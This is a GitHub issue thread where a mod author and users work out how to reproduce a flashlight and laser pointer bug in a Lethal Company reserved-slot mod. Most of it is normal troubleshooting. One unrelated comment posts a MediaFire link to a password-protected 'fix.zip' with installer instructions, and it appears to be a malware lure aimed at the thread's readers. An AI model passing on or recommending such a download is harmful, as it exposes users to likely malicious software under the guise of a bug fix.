### ISSUE TITLE
Flashlight + Laser Pointer giving issues with interacting with anything. Bugs out whole game.

### ISSUE THREAD

**Issue by Xipheus** [cmooref17/ReservedItemSlotMods#58]
_Mods Active: BepInEx, MoreCompany, LateCompany, FlashlightToggle, ItemQuickSwitch, ReservedItemCore, ReservedFlashlightSlot_

**How to Replicate:**

- Step 1: Hold Alt to have Flashlight active, turn flashlight on
- Step 2: Swap to an unused item slot
- Step 3: Pick up laser pointer
- Step 4: Try to swap to flashlight using alt, another slot, or activate flashlight

**Notes:** Seems to only occur 1 in 4-5 times but the times it does occur is a death sentence to the player. Not sure what else could be causing this. Possibly an interaction with one of the installed mods but I'm not having it with these two installed, only with it installed (ReservedCore+FlashlightSlot).

![image_2024-08-28_013655793](https://github.com/user-attachments/assets/ca147ec6-a252-4d44-8cc0-53e45cc9edf1)

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cmooref17** [comment]
I tested this without flashlight toggle, and tried your steps, but I couldn't seem to replicate it.
Maybe flashlight toggle is the problem. Do you think it's possible that it could be the culprit considering both of our mods allow toggling the flashlight with F? (unless flashlight toggle isn't bound to F, or you rebound the key for my reserved flashlight slot mod)

**Comment by MrShersh** [comment]
Same issue as you
Only flashlight (not laser). I and my friend get it today

**Comment by cmooref17** [comment]
> Same issue as you Only flashlight (not laser). I and my friend get it today


Could you give me more information about this? Does this happen to everyone, including the host? Could you give me some steps on how I can try replicating this?

**Comment by cmooref17** [comment]
Okay, if it ever happens to somebody, could you trade to accurately describe the last things that player was doing before it happened? Anything that I could try replicating to see if it happens to me? 

So far, I have not been able to replicate it yet, but then again, I don't play too often unless I'm testing stuff.

**Comment by MrShersh** [comment]
Yes, I undestand you, friend. I developer too and it is so hard when people can't say steps for reproduce bug.
I trying to find correctly steps for reproduce it. If I find it, I will give you know.
Sorry that the information I give is insufficient

**Comment by cmooref17** [comment]
Thanks, I appreciate it!
Also, would you mind sharing a profile code with me? Or a mod list?
Maybe I could try messing around with your same mods.

**Comment by MrShersh** [comment]
Here is: 01953e69-cf93-ff0d-dccc-a4688518c9e9

I found some:
This happens when two players have flashlight and radio slots equipped.

One player dies.
The second player props up the flashlight and radio of the dead player
A bug appears.
Maybe these are not 100% steps of reproduction, but most often it was like this.

**Comment by MrShersh** [comment]
Can confirm what it is releated to pick up flashlight from dead players.

**Comment by cmooref17** [comment]
I feel like I'm missing something. I'm not able to replicate this for some reason.

So this is what I did. We both have a flashlight and walkie. One player dies, and I grab their flashlight and walkie. No errors appear.
Whose client receives the error in this case? The dead person or the player who picked up the items?

Do the flashlights need to be turned on, or does it matter? Maybe you don't know this part.

**Comment by MrShersh** [comment]
This error does not always occur, maybe I'm missing something else.

The problem occurs with a living player. (Dead player dont have error in console)
The flashlight is usually always on (the dead player used it active in flashlight slot before dead)

Sometimes it happens with a delay.
Example:
I (the host) find the corpse of a friend (client). I quickly collect his things (walkie-talkie, flashlight), take a shovel or a two-handed item in my hands. Around this point I start seeing error spam.

This also happens with clients. For example, I (the host) died, my friend (the client) grabs my things and tries to run away. When he reaches the exit, he screams obscenities (heh), because he can't open the door due to an error.

Maybe this is somehow related to the quick pickup and throwing of a flashlight or a walkie-talkie from the inventory?

Another small guess. Maybe when picking up a flashlight, the code calculates a free slot and tries to use it, but can't, because it is already occupied? Or the player throws away or changes the item in his hands before the code has time to process (just a guess). At the moment of picking up the second flashlight (from the corpse), we often quickly change the items in our hands / take another loot that is lying nearby
